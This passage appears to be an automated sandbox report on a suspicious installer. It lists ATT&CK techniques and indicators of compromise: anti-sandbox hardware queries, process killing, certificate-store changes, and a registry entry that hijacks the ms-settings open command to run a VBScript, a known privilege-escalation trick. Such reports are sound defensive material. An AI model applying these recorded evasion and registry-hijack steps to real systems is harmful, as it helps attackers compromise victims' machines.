Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	o.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1079137770.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	main_v4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTok18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unik.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	safman_setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2896510401.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mesa.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	safman.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2230932668.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	646121280.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
12496	Process not Found
11452	Process not Found
12684	Process not Found
21328	Process not Found
22092	Process not Found
22056	Process not Found
7160	Process not Found
11020	Process not Found
11724	Process not Found
22548	Process not Found
23368	Process not Found
255996	Process not Found
253972	Process not Found
271280	Process not Found
20556	Process not Found
22620	Process not Found
22996	Process not Found
250712	Process not Found

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral1/files/0x001300000002b3a4-5522.dat	nsis_installer_2
behavioral1/files/0x001500000002b452-7115.dat	nsis_installer_1
behavioral1/files/0x001500000002b452-7115.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Process not Found

Checks processor information in registry 2 TTPs 42 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	tik-tok-1.0.5.0-installer_iPXA-F1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	tik-tok-1.0.5.0-installer_iPXA-F1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2724	timeout.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3916	wmic.exe
3952	wmic.exe
44796	Process not Found

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
218392	Process not Found
225720	Process not Found

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
197832	Process not Found
266076	Process not Found

Kills process with taskkill 3 IoCs

evasion

pid	Process
112052	Process not Found
117876	Process not Found
4888	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	updater.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ServiceHost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DUMP\shell\open\command\ = "\"C:\\SAF\\SAFMan\\SAFMan.exe\" \"%1\""	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\.ddf	safman_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration"	installer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DUMP\ = "SAF Dump File"	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP\shell\open\command	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP\shell	safman_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP\shell\open\ = "&Open"	safman_setup.tmp
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP\ = "SAF HDP File"	safman_setup.tmp
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\x64\\WSSDep.dll"	installer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7578.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\.dmp	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DDF\shell\open	safman_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\win32\\WSSDep.dll"	installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP	safman_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.HDP\shell\open\command\ = "\"C:\\SAF\\SAFMan\\SAFMan.exe\" \"%1\""	safman_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DDF\DefaultIcon\ = "C:\\SAF\\SAFMan\\safman.exe,2"	safman_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration"	installer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\.dmp\ = "SAF.Document.DUMP"	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	firefox.exe
